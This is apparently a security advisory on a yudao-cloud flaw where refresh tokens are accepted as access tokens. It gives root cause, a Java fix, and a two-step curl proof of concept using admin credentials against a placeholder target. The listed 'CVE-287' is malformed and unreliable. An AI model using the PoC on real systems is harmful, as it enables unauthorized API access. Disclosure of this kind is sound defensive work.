# CVE Report Summary: yudao-cloud OAuth2 Token Authentication Bypass ## Vulnerability Overview * **Vulnerability Title**: [High] yudao-cloud OAuth2 Token Authentication Bypass * **CVE ID**: CVE-287 (CWE-287) * **Severity**: High (CVSS 3.1: 7.5) * **Vulnerability Type**: Authentication Bypass * **Root Cause**: The `getAccessToken` method does not distinguish between `access_token` and `refresh_token`. When an `access_token` is not found in cache or database, the code automatically attempts to look it up as a `refresh_token`. If found and not expired, it directly converts it into an `access_token` and returns it, allowing attackers to use a `refresh_token` to access APIs directly. ## Impact Scope * **Affected Product**: yudao-cloud * **Affected Versions**: up to 2026.01 * **Affected Components**: * **File**: `yudao-module-system/biz/src/main/java/io/github/ruoyi/common/oauth2/service/impl/OAuth2TokenServiceImpl.java` * **Method**: `getAccessToken(String accessToken)` * **Attack Vector**: 1. Attacker obtains a valid `refresh_token` (via man-in-the-middle attack, database leak, or XSS). 2. Attacker sends a request using the `refresh_token` as the `Authorization: Bearer ` header. 3. Server accepts the `refresh_token` as a valid `access_token`. 4. Attacker gains unauthorized access to protected API resources. * **Potential Impact**: 1. **Authentication Bypass**: Exploiting a stolen `refresh_token` to bypass authentication mechanisms. 2. **Unauthorized Access**: Accessing protected API resources without a valid `access_token`. 3. **Data Leakage**: Possible exposure of user data and system information. 4. **Privilege Escalation**: Depending on the user associated with the `refresh_token`, attacker may gain higher privileges. ## Remediation * **Recommended Fix Code**: Remove the fallback logic for `refresh_token` in the `getAccessToken` method. ```java @Override public OAuth2AccessTokenDO getAccessToken(String accessToken) { // Only query access_token, never accept refresh_token as access_token OAuth2AccessTokenDO accessTokenDO = oauth2AccessTokenRedisDAO.get(accessToken); if (accessTokenDO != null) { return accessTokenDO; } accessTokenDO = oauth2AccessTokenMapper.selectByAccessToken(accessToken); // Remove the refresh_token fallback logic entirely return accessTokenDO; } ``` * **Additional Security Measures**: 1. Implement strict token type validation. 2. Add token origin tracking (distinguish usage scenarios of `access_token` and `refresh_token`). 3. Apply rate limiting to token validation requests. 4. Add anomaly detection to identify unusual token usage patterns. 5. Log token validation attempts for security monitoring. ## Proof of Concept (PoC) **Step 1: Obtain Refresh Token** ```bash # Normal login to get tokens curl -X POST "https://target.com/admin-api/system/auth/login" \ -H "Content-Type: application/json" \ -d '{"username":"admin","password":"admin123"}' ``` **Response Example:** ```json { "code": 0, "data": { "accessToken": "eyJ...", "refreshToken": "eyJ...", "expiresTime": 17250700000 } } ``` **Step 2: Use Refresh Token as Access Token** ```bash # Use refresh_token as access_token (Authentication Bypass) curl -X GET "https://target.com/admin-api/system/user/page" \ -H "Authorization: Bearer " ``` If the vulnerability exists, the request will succeed, and the attacker gains unauthorized access.